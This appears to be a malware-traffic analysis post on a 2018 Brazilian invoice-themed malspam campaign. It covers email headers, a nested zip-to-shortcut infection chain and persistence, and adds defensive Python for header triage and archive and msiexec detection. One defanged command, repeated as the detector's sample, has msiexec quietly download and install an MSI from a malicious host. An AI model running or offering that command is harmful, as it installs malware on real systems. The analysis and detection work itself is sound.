2018-03-20 - BRAZIL MALSPAM AND INFECTION TRAFFIC

ASSOCIATED FILES:

  • 2018-03-20-Brazil-malspam-1222-UTC.eml   (1,638 bytes)
  • 2018-03-20-Brazil-malspam-infection-traffic.pcap   (2,788,607 bytes)
  • 2018-03-20-downloaded-archive-Nota_Fiscal8987513469.pdf.zip   (731 bytes)
  • 2018-03-20-extracted-file-Nota_Fiscal8987513469.pdf.pdff-actually-a-zip-file.zip   (614 bytes)
  • 2018-03-20-second-extracted-file-Microsoft-shortcut-Nota_Fiscal8987513469.pdf.lnk.bin   (842 bytes)
  • 2018-03-20-scheduled-task-to-keep-infection-persistent.txt   (3,820 bytes)

 

WEB TRAFFIC BLOCK LIST

Indicators are not a block list.  If you feel the need to block web traffic, I suggest the following domains:

 

EMAIL:


Shown above:  Screenshot from the email.

 

EMAIL HEADERS:

Received: from X3530-WSERVER.bevicred.com.br ([187.73.214.27]) by [removed] for [removed];
     Tue, 20 Mar 2018 12:22:47 +0000 (UTC)
Received: from Recepcao (unknown [191.209.24.105])
     (Authenticated sender: formalizacao.ma1@bevicred.com.br)
     by X3530-WSERVER.bevicred.com.br (Postfix) with ESMTPA id 4A06B1435C73
     for [removed]; Tue, 20 Mar 2018 09:22:10 -0300 (-03)
Date: Tue, 20 Mar 2018 09:22:12 -0300
X-Priority: 3
Subject: Notificação 9985686405 de Emissão de Nota Fiscal Eletrônica.
X-Library: Indy 9.00.10
From: POLIPONTO COMERCIO E SERVICOS LTDA <formalizacao.ma1@bevicred.com.br>
Content-type: text/html
To: [removed]
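The interesting part of these headers is the second Received line: the message was not relayed in from outside but submitted with SMTP AUTH (ESMTPA) through the bevicred.com.br Postfix server by a client that has no reverse DNS, so the sending mailbox, not the mail server, is what was abused. The following Python is an added example, not from the original page, that pulls the Received chain apart and raises the checks a mail gateway analyst would want on this message; the sample headers are the ones shown above, and the X-Library heuristic is my own assumption rather than anything the page states.

```python
"""Triage of a Received chain, using the headers quoted above as the sample."""
import email
import re

# Constructed sample: the header block from this page, recipient fields
# redacted exactly as the page shows them.
SAMPLE_HEADERS = """\
Received: from X3530-WSERVER.bevicred.com.br ([187.73.214.27]) by [removed] for [removed];
     Tue, 20 Mar 2018 12:22:47 +0000 (UTC)
Received: from Recepcao (unknown [191.209.24.105])
     (Authenticated sender: formalizacao.ma1@bevicred.com.br)
     by X3530-WSERVER.bevicred.com.br (Postfix) with ESMTPA id 4A06B1435C73
     for [removed]; Tue, 20 Mar 2018 09:22:10 -0300 (-03)
Date: Tue, 20 Mar 2018 09:22:12 -0300
X-Priority: 3
Subject: Notificação 9985686405 de Emissão de Nota Fiscal Eletrônica.
X-Library: Indy 9.00.10
From: POLIPONTO COMERCIO E SERVICOS LTDA <formalizacao.ma1@bevicred.com.br>
Content-type: text/html
To: [removed]

"""

IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def unfold(value):
    """Join a folded header value back onto one line (RFC 5322 folding)."""
    return re.sub(r"\r?\n[ \t]+", " ", value).strip()


def parse_received(value):
    """Pull the fields an analyst pivots on out of one Received header."""
    v = unfold(value)
    hop = {"from": None, "from_ip": None, "by": None, "with": None,
           "auth_sender": None, "unresolved": False}
    m = re.search(r"\bfrom\s+(\S+)((?:\s*\([^)]*\))*)", v)
    if m:
        hop["from"] = m.group(1)
        comments = m.group(2)            # the parenthesised parts after the host
        ip = IPV4.search(comments)
        hop["from_ip"] = ip.group(1) if ip else None
        # Postfix writes "unknown" when the client IP has no reverse DNS.
        hop["unresolved"] = "unknown" in comments
        a = re.search(r"Authenticated sender:\s*([^\s)]+)", comments)
        hop["auth_sender"] = a.group(1) if a else None
    m = re.search(r"\bby\s+(\S+)", v)
    hop["by"] = m.group(1) if m else None
    m = re.search(r"\bwith\s+(\S+)", v)
    hop["with"] = m.group(1) if m else None
    return hop


def hops(raw_headers):
    """Received headers in transit order: the origin (last header) first."""
    msg = email.message_from_string(raw_headers)
    return [parse_received(h) for h in reversed(msg.get_all("Received", []))]


def origin_ip(raw_headers):
    """Client IP of the first hop, i.e. the host that submitted the message."""
    chain = hops(raw_headers)
    return chain[0]["from_ip"] if chain else None


def triage(raw_headers):
    """Return (tag, detail) findings worth a second look at a mail gateway."""
    msg = email.message_from_string(raw_headers)
    chain = hops(raw_headers)
    findings = []
    for hop in chain:
        # An authenticated submission from a client without rDNS is what an
        # abused mailbox (stolen or phished credentials) looks like in headers.
        if hop["auth_sender"] and hop["unresolved"]:
            findings.append(("auth-submission-unresolved-client",
                             f"{hop['from_ip']} authenticated as "
                             f"{hop['auth_sender']} on {hop['by']}"))
    lib = msg.get("X-Library", "")
    if lib.startswith("Indy"):
        # Heuristic (assumption, not from the page): Indy is a Delphi networking
        # library, and a normal mail client does not advertise it in headers.
        findings.append(("x-library-indy", lib))
    from_hdr = msg.get("From", "")
    m = re.search(r"<([^>]+)>", from_hdr)
    from_addr = m.group(1) if m else from_hdr.strip()
    auth = next((h["auth_sender"] for h in chain if h["auth_sender"]), None)
    if auth and auth.lower() != from_addr.lower():
        findings.append(("from-vs-auth-mismatch", f"{from_addr} != {auth}"))
    return findings


if __name__ == "__main__":
    print("origin:", origin_ip(SAMPLE_HEADERS))
    for tag, detail in triage(SAMPLE_HEADERS):
        print(tag, "-", detail)
```

On this sample the From address and the authenticated sender agree, so the mismatch check stays quiet; the two hits are the authenticated submission from the unresolved 191.209.24.105 client and the Indy library header. The origin IP of the chain is the value to pivot on, not the Postfix server, which belongs to the abused account's provider.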

 

LINK FROM THE EMAIL:

 

TRAFFIC


Shown above:  Traffic from an infection filtered in Wireshark.

 

NETWORK TRAFFIC FROM AN INFECTED LAB HOST:

 

FILE HASHES

MALWARE RETRIEVED FROM AN INFECTED WINDOWS HOST:

  • C:\Windows\system32\msiexec.exe /i hxxp://486lrlk94.mike-ehrmantraut.wikaba.com:25047/01/dimfrags.msi?ddOYIFJbm /q
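The chain documented by the associated files is a zip archive holding a file named .pdff that is itself a zip, which in turn holds a Windows shortcut, and the shortcut's payload ends in msiexec.exe fetching an MSI package straight from a URL with the quiet switch. The Python below is an added example, not code from the original page, that covers the two checks a practitioner would automate for this pattern: unpacking nested archives by content rather than by extension, and flagging msiexec command lines that install from a URL. The nested archive is constructed in memory with a stand-in LNK blob (only the Shell Link header magic, not a real shortcut), and the command line is the one listed above.

```python
"""Content-based unpacking of nested archives plus msiexec-from-URL detection."""
import io
import re
import zipfile
from urllib.parse import urlparse

ZIP_MAGIC = b"PK\x03\x04"
# Shell Link header: HeaderSize 0x4C followed by the start of the ShellLink CLSID.
LNK_MAGIC = b"L\x00\x00\x00\x01\x14\x02\x00"

# Constructed sample: the command line from this page (URL left defanged).
SAMPLE_CMDLINE = (r"C:\Windows\system32\msiexec.exe /i "
                  r"hxxp://486lrlk94.mike-ehrmantraut.wikaba.com:25047/01/dimfrags.msi?ddOYIFJbm /q")


def build_sample_chain():
    """Constructed stand-in for the page's chain: zip -> '.pdff' zip -> .lnk.
    The LNK member is a fake blob with the right magic, not a real shortcut."""
    fake_lnk = LNK_MAGIC + b"\x00" * 64
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("Nota_Fiscal8987513469.pdf.lnk", fake_lnk)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Nota_Fiscal8987513469.pdf.pdff", inner.getvalue())
    return outer.getvalue()


def sniff(data):
    """Identify content by magic bytes, ignoring whatever the name claims."""
    if data.startswith(ZIP_MAGIC):
        return "zip"
    if data.startswith(LNK_MAGIC):
        return "lnk"
    return "unknown"


def unpack_chain(data, name="download.zip", depth=0, max_depth=5):
    """Recursively open every member that sniffs as a zip, whatever its extension.
    Returns (name, declared_extension, sniffed_type, depth) for each member."""
    kind = sniff(data)
    rows = [(name, name.rsplit(".", 1)[-1].lower(), kind, depth)]
    if kind == "zip" and depth < max_depth:          # depth cap against zip bombs
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for info in z.infolist():
                rows.extend(unpack_chain(z.read(info), info.filename, depth + 1, max_depth))
    return rows


def suspicious_members(rows):
    """Flag members whose content contradicts the extension, shortcuts inside
    archives, and document-looking double extensions such as x.pdf.lnk."""
    doc_like = {"pdf", "pdff", "doc", "docx", "xls", "xlsx", "txt"}
    out = []
    for name, ext, kind, _depth in rows:
        reasons = []
        if ext in doc_like and kind in ("zip", "lnk"):
            reasons.append(f"extension .{ext} but content is {kind}")
        if kind == "lnk":
            reasons.append("Windows shortcut inside archive")
        parts = name.lower().split(".")
        if len(parts) > 2 and parts[-2] in doc_like:
            reasons.append("double extension")
        if reasons:
            out.append((name, reasons))
    return out


MSIEXEC = re.compile(r"(?i)\bmsiexec(?:\.exe)?\b")
URL = re.compile(r"(?i)\b(?:hxxps?|https?)://\S+")


def suspicious_msiexec(cmdline):
    """(True, details) when msiexec is told to install a package from a URL;
    a local .msi path is the normal case and returns (False, {})."""
    if not MSIEXEC.search(cmdline):
        return False, {}
    m = URL.search(cmdline)
    if not m:
        return False, {}
    u = urlparse(m.group(0).replace("hxxp", "http", 1))   # re-fang for parsing
    details = {"host": u.hostname, "port": u.port, "path": u.path,
               "install": bool(re.search(r"(?i)(?:^|\s)/i\b", cmdline)),
               "quiet": bool(re.search(r"(?i)(?:^|\s)/q(?:n|b)?\b", cmdline))}
    return True, details


if __name__ == "__main__":
    rows = unpack_chain(build_sample_chain(), "Nota_Fiscal8987513469.pdf.zip")
    for name, reasons in suspicious_members(rows):
        print(name, "->", "; ".join(reasons))
    print(suspicious_msiexec(SAMPLE_CMDLINE))
```

Sniffing by magic rather than trusting the name is what makes the .pdff layer fall out: a scanner that stops at "not a zip extension" never sees the shortcut. On the endpoint side, msiexec with /i and an http(s) URL is rare enough in most environments that the command-line match alone is a reasonable alert; the non-standard port and the quiet switch are extra context, not preconditions.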

 

IMAGES


Shown above:  From downloaded zip archive to the Windows shortcut.

 


Shown above:  Scheduled task to keep the infection persistent.

 

FINAL NOTES

Once again, here are the associated files:

Zip archives are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

 
